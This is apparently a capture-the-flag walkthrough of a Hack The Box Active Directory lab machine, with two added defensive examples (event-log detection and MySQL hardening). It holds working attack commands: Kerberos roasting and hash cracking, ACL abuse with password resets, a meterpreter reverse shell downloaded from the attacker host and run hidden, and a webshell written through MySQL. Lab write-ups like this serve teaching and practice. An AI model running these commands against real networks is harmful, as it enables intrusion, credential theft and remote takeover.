HTB-Infiltrator: a walk through domain penetration testing
Word count: 1096 | 2025-08-20 18:18:16
HTB-Infiltrator domain penetration hands-on tutorial
1. Target information gathering
1.1 Port scanning and service identification
Port scanning with Nmap found the following open ports:
53/tcp - domain (DNS service)
80/tcp - http (IIS 10.0)
88/tcp - kerberos-sec
135/tcp - msrpc
139/tcp - netbios-ssn
389/tcp - ldap (Active Directory)
445/tcp - microsoft-ds (SMB)
464/tcp - kpasswd5
593/tcp - ncacn_http (RPC over HTTP)
636/tcp - ldapssl
3268/tcp - globalcatLDAP
3269/tcp - globalcatLDAPssl
3389/tcp - ms-wbt-server (RDP)
5985/tcp - wsman (WinRM)
9389/tcp - adws
15220/tcp - unknown
15230/tcp - unknown
1.2 Domain and host identification
- Domain: infiltrator.htb
- Hostname: dc01.infiltrator.htb
- Operating system: Windows Server 2019 (Build 17763)
2. Preparing for domain penetration
2.1 DNS server configuration
Point the local DNS resolver at the target machine:
sudo vim /etc/resolv.conf
# add the following entries
nameserver 10.10.11.31
nameserver 192.168.122.1
Verify DNS resolution:
nslookup dc01.infiltrator.htb
3. Web penetration and user enumeration
3.1 Information gathering on port 80
Extract team member names from the website page:
curl -s http://dc01.infiltrator.htb | xmllint --html --xpath "//div/div/h4" -
Extracted list of names:
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
3.2 Building a domain user wordlist
Use awk to generate the likely domain username formats:
awk '{
name = $0
split(name, parts, " ")
first = tolower(parts[1])
last = tolower(parts[2])
print first "." last "@infiltrator.htb"
print first "_" last "@infiltrator.htb"
print substr(first, 1, 1) "." last "@infiltrator.htb"
print substr(first, 1, 1) "_" last "@infiltrator.htb"
}' username > AD_username
3.3 Enumerating valid users with kerbrute
kerbrute userenum -d infiltrator.htb AD_username
# if DNS is not configured, specify the DC explicitly
kerbrute userenum -d infiltrator.htb AD_username --dc dc01.infiltrator.htb
Verified valid users:
o.martinez@infiltrator.htb
d.anderson@infiltrator.htb
k.turner@infiltrator.htb
a.walker@infiltrator.htb
m.harris@infiltrator.htb
e.rodriguez@infiltrator.htb
l.clark@infiltrator.htb
4. Kerberos attack and hash cracking
4.1 Obtaining the hash of a user that does not require pre-authentication
impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass
# if DNS is not configured
impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass -dc-ip dc01.infiltrator.htb
l.clark@infiltrator.htb was found not to require Kerberos pre-authentication, and its AS-REP hash was retrieved.
4.2 Cracking the hash with hashcat
Identify the hash type:
hashcat l.clark@infiltrator.htb_hash
# identified as mode 18200 (Kerberos 5, etype 23, AS-REP)
Crack the hash:
hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt
Result:
l.clark@infiltrator.htb:WAT?watismypass!
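From the defender's side, the kerbrute enumeration in 3.3 and the AS-REP roast in 4.1/4.2 both leave a footprint in Windows Security event 4768 (TGT requested). The following is an added example, not part of the original write-up; the event records are constructed samples shaped like 4768 fields, and the threshold value is an assumption.

```python
# Added defensive example (not from the original write-up): flag the Kerberos
# activity produced by user enumeration (3.3) and AS-REP roasting (4.x)
# in Windows Security event 4768 records (TGT requested).
from collections import Counter

# Constructed sample events; field names follow the 4768 event XML, values are made up.
# Failed requests are logged with PreAuthType "-" and TicketEncryptionType 0xffffffff.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "l.clark", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.16.2"},
    {"EventID": 4768, "TargetUserName": "d.anderson", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.11.50"},
    {"EventID": 4768, "TargetUserName": "john.doe", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "Status": "0x6", "IpAddress": "10.10.16.2"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "Status": "0x6", "IpAddress": "10.10.16.2"},
    {"EventID": 4769, "TargetUserName": "m.harris", "PreAuthType": "-",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.11.50"},
]

def is_asrep_roast(ev):
    """Successful TGT (Status 0x0) issued with no pre-auth (type 0) and RC4 (0x17):
    the shape GetNPUsers relies on and hashcat mode 18200 cracks."""
    return (ev["EventID"] == 4768 and ev["PreAuthType"] == "0"
            and ev["TicketEncryptionType"].lower() == "0x17" and ev["Status"] == "0x0")

def unknown_user_probes(events, threshold=2):
    """Count 4768 failures with Status 0x6 (client principal unknown) per source IP.
    A burst from one host is the footprint of a username-list enumeration.
    The threshold is an assumed tuning value."""
    counts = Counter(ev["IpAddress"] for ev in events
                     if ev["EventID"] == 4768 and ev["Status"] == "0x6")
    return {ip: n for ip, n in counts.items() if n >= threshold}

def roasted_accounts(events):
    """Return sorted (user, source ip) pairs to review; the user's DONT_REQ_PREAUTH
    flag should be cleared unless there is a documented need for it."""
    return sorted({(ev["TargetUserName"], ev["IpAddress"])
                   for ev in events if is_asrep_roast(ev)})

if __name__ == "__main__":
    for user, ip in roasted_accounts(SAMPLE_EVENTS):
        print(f"AS-REP roast candidate: {user} requested from {ip}")
    for ip, n in unknown_user_probes(SAMPLE_EVENTS).items():
        print(f"Possible user enumeration: {n} unknown-principal requests from {ip}")
```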
5. Lateral movement and privilege escalation
5.1 Trying psexec
impacket-psexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb
5.2 Analysing the domain structure with BloodHound
Collect data:
bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip
Attack path found:
D.ANDERSON@INFILTRATOR.HTB ---GenericAll---> MARKETING DIGITAL@INFILTRATOR.HTB
MARKETING DIGITAL@INFILTRATOR.HTB ---Contains---> E.RODRIGUEZ@INFILTRATOR.HTB
E.RODRIGUEZ@INFILTRATOR.HTB ---AddSelf---> CHIEFS MARKETING@INFILTRATOR.HTB
CHIEFS MARKETING@INFILTRATOR.HTB ---ForceChangePassword---> M.HARRIS@INFILTRATOR.HTB
5.3 Executing the attack path
- Obtain a TGT for d.anderson:
impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=d.anderson.ccache
- Modify the ACL so that d.anderson gets full control over MARKETING DIGITAL:
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb
- Reset e.rodriguez's password:
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" set password "e.rodriguez" "QWEasd123@123"
- Add e.rodriguez to the CHIEFS MARKETING group:
getTGT.py infiltrator.htb/"e.rodriguez":"QWEasd123@123" -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=e.rodriguez.ccache
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
- Reset m.harris's password:
python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" "QWEasd123@123"
- Connect with evil-winrm:
getTGT.py infiltrator.htb/m.harris:'QWEasd123@123' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=m.harris.ccache
evil-winrm -i dc01.infiltrator.htb -u m.harris -r infiltrator.htb
6. Persistence
Generate a reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe
Start an HTTP server:
python -m http.server 80
Download and execute on the target (in PowerShell, wget is an alias of Invoke-WebRequest, so the output file is given with -OutFile):
wget http://10.10.16.2/reverse.exe -OutFile reverse.exe
Start-Process -FilePath "reverse.exe" -WindowStyle Hidden
Start the listener:
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.16.2; set lport 9001; exploit -j"
7. Privilege escalation and final compromise
7.1 Enumerating escalation paths with PEASS-NG
start /b winPEASx64.exe >> output.txt
Suspicious processes found:
OMServerService
outputmessenger_httpd
outputmessenger_mysqld
7.2 Escalation via MySQL
- Port-forward the MySQL service:
portfwd add -l 53366 -L 0.0.0.0 -p 14406 -r 10.10.11.31
- Connect to MySQL:
mysql -h 127.0.0.1 -uroot -P 53366 -p
# the password is ibWijteig5
- Read sensitive files:
SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
- Attempt UDF privilege escalation (failed):
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
7.3 Escalation via Apache
- Port-forward the Apache service:
portfwd add -l 14126 -L 0.0.0.0 -p 14126 -r 10.10.11.31
- Write a webshell through MySQL:
select "<?php echo `whoami`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";
- Access the webshell to obtain SYSTEM privileges:
http://127.0.0.1:14126/whoami.php
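Both 7.2 and 7.3 depend on the MySQL server being allowed to read and write arbitrary paths (LOAD_FILE, INTO DUMPFILE into the plugin directory, INTO OUTFILE into the web root). The following is an added hardening example, not the Output Messenger Server's actual my.ini; the directory paths are placeholders.

```ini
# Added example (not the Output Messenger Server's real configuration): the
# server settings that let 7.2 and 7.3 work, beside their hardened counterparts.
# Paths are placeholders.

# --- weak: LOAD_FILE()/INTO OUTFILE/INTO DUMPFILE may touch any path the
# service account can reach, including plugin_dir and the web root ---
[mysqld]
secure_file_priv=""
local_infile=ON
# plugin_dir left writable by the account mysqld runs as

# --- hardened ---
[mysqld]
# Confine file import/export to one dedicated directory; set to NULL to
# disable LOAD_FILE(), SELECT ... INTO OUTFILE/DUMPFILE and LOAD DATA INFILE.
secure_file_priv="C:/mysql-files"
local_infile=OFF
# Keep plugin_dir on a path the service account can only read, so a session
# holding FILE cannot drop a UDF library there (the 7.2 attempt).
plugin_dir="C:/Program Files/MySQL/lib/plugin"
# Also run the service as a dedicated low-privilege account instead of
# LocalSystem, and revoke FILE from accounts that do not need it:
#   REVOKE FILE ON *.* FROM 'root'@'localhost';
```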
8. Summary
The complete flow of this penetration test:
- Information gathering and user enumeration
- Kerberos attack to obtain and crack a hash
- Domain structure analysis with BloodHound
- Privilege escalation through ACL abuse
- Persistence and lateral movement
- Final privileges obtained through the MySQL and Apache services
Key points:
- Correct DNS configuration is essential for domain penetration testing
- Accounts without Kerberos pre-authentication are a common entry point
- BloodHound is a powerful tool for analysing domain structure
- ACL abuse is a common technique in domain penetration testing
- Misconfigured services can lead directly to privilege escalation